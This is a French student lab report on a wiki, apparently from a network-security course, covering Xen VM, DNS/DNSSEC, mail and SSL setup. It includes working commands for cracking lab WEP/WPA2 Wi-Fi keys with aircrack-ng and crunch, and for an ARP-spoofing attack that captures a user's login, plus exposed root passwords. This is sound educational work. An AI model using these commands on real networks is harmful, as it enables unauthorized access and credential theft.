2020-11-20T10:02:23Z

Aglaine : /* Envoie du SSL Certification Gandi */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]
 

On constate que on resoit bien les message en provenance du mail de Polytech.
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'

Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande <code>admin:root</code>
On crée ensuite un <code>newaliases</code> puis on restarte bind9 avec la commance <code>service bind9 restart</code>

Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.

====Envoie du SSL Certification Gandi====

Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.

[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]
 

Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'

Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.
[[Fichier:Gandi-téléchargement_clefetcertifica_mirage.png|1000px|thumb|left|Fichiers gandi a télechargé]]
 

quand on utilise le ssh on passe par le port '442' dans le fichier <code>/etc/apache2/sites-available/default-ssl.conf</code>
On ajoute les lignes suivantes :

SSLEngine on
SSLCertificateFile /root/glopglop.site.crt
SSLCertificateKeyFile /root/myserver.key
SSLCertificateChainFile /root/GandiStandardSSLCA2.pem

On reboot le service apash2 pour qu'il prenne les modification en compte.

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

Fichier:Gandi-téléchargement clefetcertifica mirage.png

2020-11-20T10:00:40Z

Aglaine : Aglaine a téléversé une nouvelle version de Fichier:Gandi-téléchargement clefetcertifica mirage.png

Fichier:Gandi-téléchargement clefetcertifica mirage.png

2020-11-20T09:58:14Z

Aglaine : Aglaine a téléversé une nouvelle version de Fichier:Gandi-téléchargement clefetcertifica mirage.png

TP sysres IMA2a5 2020/2021 G5

2020-11-20T09:48:47Z

Aglaine : /* Envoie du SSL Certification Gandi */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

